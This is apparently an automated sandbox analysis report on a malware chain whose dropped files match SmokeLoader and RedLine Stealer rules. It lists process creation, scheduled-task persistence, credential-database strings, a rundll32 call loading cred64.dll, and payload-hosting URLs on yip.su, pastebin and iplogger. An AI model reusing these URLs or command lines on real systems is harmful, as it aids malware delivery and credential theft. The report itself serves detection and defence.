Source: MPGPH131.exe, 0000001B.00000003.3206207533.0000000008124000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820488974.0000000007CDD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820609546.0000000007CE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountYouTube/v/
Source: MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountkO
Source: d361f35322.exe, 00000024.00000003.2820673524.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%
Source: file300un.exe, 00000032.00000002.7140120246.000001F380091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://yip.su/RNWPd.exeChttps://pastebin.com/raw/E0rY26ni5https://iplogger.com/1lyxz
Source: MPGPH131.exe, 0000001B.00000003.3204849861.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819272725.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819336338.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.comVISITOR_INFO1_LIVE/
Source: MPGPH131.exe, 0000001B.00000003.3204849861.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819272725.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819336338.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, u6po.0.exe, 00000033.00000003.2232787568.00000000220DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.comVISITOR_INFO1_LIVEv10%
Source: d361f35322.exe, 00000009.00000003.2912110551.0000000007DBC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3204849861.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819272725.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819336338.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.comVISITOR_PRIVACY_METADATA/(9
Source: u6po.0.exe, 00000033.00000003.2232787568.00000000220DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.comVISITOR_PRIVACY_METADATAv10
Source: d361f35322.exe, 00000009.00000003.2912110551.0000000007DBC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3204849861.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819272725.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819336338.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.comYSC/)?
Source: MPGPH131.exe, 0000001B.00000003.3204849861.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819272725.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819336338.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, u6po.0.exe, 00000033.00000003.2232787568.00000000220DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.comYSCv10

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000031.00000002.2229022734.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.2229087093.0000000003661000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Installs a raw input device (often for capturing keystrokes)
Source: ac861238af.exe, 00000010.00000003.7189686015.0000000000C7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICESYx memstr_ee7ff430-3
Drops certificate files (DER)
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe File created: C:\Users\user\AppData\Local\Temp\TmpC21F.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe File created: C:\Users\user\AppData\Local\Temp\TmpC1FF.tmp Jump to dropped file

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000031.00000002.2229022734.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000031.00000002.2229087093.0000000003661000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000031.00000002.2228939653.00000000034F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000031.00000002.2228816968.0000000001B2B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
.NET source code contains very large array initializations
Source: swiiiii[1].exe.10.dr, RemoteObjects.cs Large array initialization: RemoteObjects: array initializer size 297472
Source: swiiiii.exe.10.dr, RemoteObjects.cs Large array initialization: RemoteObjects: array initializer size 297472
Source: swiiii[1].exe.10.dr, RemoteObjects.cs Large array initialization: RemoteObjects: array initializer size 153088
Source: swiiii.exe.10.dr, RemoteObjects.cs Large array initialization: RemoteObjects: array initializer size 153088
Binary is likely a compiled AutoIt script file
Source: ac861238af.exe, 00000010.00000000.1932011901.0000000000762000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_95765f4c-3
Source: ac861238af.exe, 00000010.00000000.1932011901.0000000000762000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_1d9ccc15-0
PE file contains section with special chars
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: sarra[1].exe.1.dr Static PE information: section name:
Source: sarra[1].exe.1.dr Static PE information: section name: .idata
Source: sarra[1].exe.1.dr Static PE information: section name:
Source: amert[1].exe.1.dr Static PE information: section name:
Source: amert[1].exe.1.dr Static PE information: section name: .idata
Source: amert[1].exe.1.dr Static PE information: section name:
Source: amert.exe.1.dr Static PE information: section name:
Source: amert.exe.1.dr Static PE information: section name: .idata
Source: amert.exe.1.dr Static PE information: section name:
Source: random[1].exe.1.dr Static PE information: section name:
Source: random[1].exe.1.dr Static PE information: section name: .idata
Source: random[1].exe.1.dr Static PE information: section name:
Source: d361f35322.exe.1.dr Static PE information: section name:
Source: d361f35322.exe.1.dr Static PE information: section name: .idata
Source: d361f35322.exe.1.dr Static PE information: section name:
Source: explorha.exe.7.dr Static PE information: section name:
Source: explorha.exe.7.dr Static PE information: section name: .idata
Source: explorha.exe.7.dr Static PE information: section name:
Source: RageMP131.exe.9.dr Static PE information: section name:
Source: RageMP131.exe.9.dr Static PE information: section name: .idata
Source: RageMP131.exe.9.dr Static PE information: section name:
Source: MPGPH131.exe.9.dr Static PE information: section name:
Source: MPGPH131.exe.9.dr Static PE information: section name: .idata
Source: MPGPH131.exe.9.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File created: C:\Windows\Tasks\explorta.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008D8080 9_2_008D8080
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0082001D 9_2_0082001D
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008761D0 9_2_008761D0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BD2B0 9_2_008BD2B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BC3E0 9_2_008BC3E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BB7E0 9_2_008BB7E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0085F730 9_2_0085F730
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0091C8D0 9_2_0091C8D0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_007EB8E0 9_2_007EB8E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008B49B0 9_2_008B49B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00878A80 9_2_00878A80
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00871A60 9_2_00871A60
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0087CBF0 9_2_0087CBF0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00887D20 9_2_00887D20
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0087AEC0 9_2_0087AEC0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00873ED0 9_2_00873ED0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0086DF60 9_2_0086DF60
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_009240A0 9_2_009240A0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_009120C0 9_2_009120C0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00817190 9_2_00817190
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00862100 9_2_00862100
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00881130 9_2_00881130
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00923160 9_2_00923160
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0091F280 9_2_0091F280
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0082035F 9_2_0082035F
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008D0350 9_2_008D0350
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0080F570 9_2_0080F570
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00989680 9_2_00989680
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008347AD 9_2_008347AD
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0081A918 9_2_0081A918
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0081C950 9_2_0081C950
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00924AE0 9_2_00924AE0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00925A40 9_2_00925A40
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0082DA74 9_2_0082DA74
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008C4B90 9_2_008C4B90
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00838BA0 9_2_00838BA0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00870BA0 9_2_00870BA0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00838E20 9_2_00838E20
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00881E40 9_2_00881E40
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008CBFC0 9_2_008CBFC0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008CCFC0 9_2_008CCFC0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: String function: 007FACE0 appears 86 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 928
PE file contains more sections than normal
Source: explorta.exe.0.dr Static PE information: Number of sections : 12 > 10
Source: 1CMweaqlKp.exe Static PE information: Number of sections : 12 > 10
PE file does not import any functions
Source: file300un.exe.10.dr Static PE information: No import functions for PE file found
Source: file300un[1].exe.10.dr Static PE information: No import functions for PE file found
Uses 32bit PE files
Source: 1CMweaqlKp.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000031.00000002.2229022734.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000031.00000002.2229087093.0000000003661000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000031.00000002.2228939653.00000000034F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000031.00000002.2228816968.0000000001B2B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: swiiiii[1].exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: swiiiii.exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: swiiii[1].exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: swiiii.exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1CMweaqlKp.exe Static PE information: Section: ZLIB complexity 0.9998594874100719
Source: 1CMweaqlKp.exe Static PE information: Section: ZLIB complexity 0.9919149709302325
Source: 1CMweaqlKp.exe Static PE information: Section: ZLIB complexity 1.00537109375
Source: 1CMweaqlKp.exe Static PE information: Section: .boot ZLIB complexity 0.9902337473891388
Source: 1CMweaqlKp.exe Static PE information: Section: .reloc ZLIB complexity 1.5
Source: explorta.exe.0.dr Static PE information: Section: ZLIB complexity 0.9998594874100719
Source: explorta.exe.0.dr Static PE information: Section: ZLIB complexity 0.9919149709302325
Source: explorta.exe.0.dr Static PE information: Section: ZLIB complexity 1.00537109375
Source: explorta.exe.0.dr Static PE information: Section: .boot ZLIB complexity 0.9902337473891388
Source: explorta.exe.0.dr Static PE information: Section: .reloc ZLIB complexity 1.5
Source: amert[1].exe.1.dr Static PE information: Section: ZLIB complexity 0.9981777815013405
Source: amert[1].exe.1.dr Static PE information: Section: avcjhwxy ZLIB complexity 0.9946098513719512
Source: amert.exe.1.dr Static PE information: Section: ZLIB complexity 0.9981777815013405
Source: amert.exe.1.dr Static PE information: Section: avcjhwxy ZLIB complexity 0.9946098513719512
Source: explorha.exe.7.dr Static PE information: Section: ZLIB complexity 0.9981777815013405
Source: explorha.exe.7.dr Static PE information: Section: avcjhwxy ZLIB complexity 0.9946098513719512
Source: gold[1].exe.10.dr Static PE information: Section: .Left ZLIB complexity 0.998365875385208
Source: gold.exe.10.dr Static PE information: Section: .Left ZLIB complexity 0.998365875385208
Source: sarra[1].exe.1.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file300un[1].exe.10.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: file300un.exe.10.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winEXE@133/199@0/39
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BD2B0 RegOpenKeyExA,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,GetLocalTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,GetSystemInfo,GlobalMemoryStatusEx,CreateToolhelp32Snapshot,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA, 9_2_008BD2B0
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sarra[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8944:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8272:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3756:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2588
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File created: C:\Users\user\AppData\Local\Temp\5454e6f062 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: d361f35322.exe, 00000009.00000002.3072030296.00000000007E1000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 0000001B.00000003.2069728672.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3349331204.0000000000701000.00000040.00000001.01000000.00000012.sdmp, MPGPH131.exe, 0000001C.00000003.2070120899.0000000005180000.00000004.00001000.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2021888097.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000002.3072062602.00000000007E1000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000002E.00000003.2138214229.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002E.00000002.2634123106.0000000000891000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: d361f35322.exe, 00000009.00000002.3072030296.00000000007E1000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 0000001B.00000003.2069728672.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3349331204.0000000000701000.00000040.00000001.01000000.00000012.sdmp, MPGPH131.exe, 0000001C.00000003.2070120899.0000000005180000.00000004.00001000.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2021888097.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000002.3072062602.00000000007E1000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000002E.00000003.2138214229.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002E.00000002.2634123106.0000000000891000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: d361f35322.exe, 00000009.00000003.2767781607.0000000007DB1000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000009.00000003.2766547058.0000000007DB1000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2941355973.0000000007CD2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.2942331492.0000000008153000.00000004.00000020.00020000.00000000.sdmp, u6po.0.exe, 00000033.00000003.2239168944.00000000220D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 1CMweaqlKp.exe ReversingLabs: Detection: 50%
Source: 1CMweaqlKp.exe Virustotal: Detection: 44%
Source: amert.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: d361f35322.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: d361f35322.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File read: C:\Users\user\Desktop\1CMweaqlKp.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\1CMweaqlKp.exe "C:\Users\user\Desktop\1CMweaqlKp.exe"
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2656 --field-trial-handle=2296,i,9301016893778941798,11505312185340456869,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe "C:\Users\user\AppData\Local\Temp\1000019001\amert.exe"
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process created: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe "C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe"
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
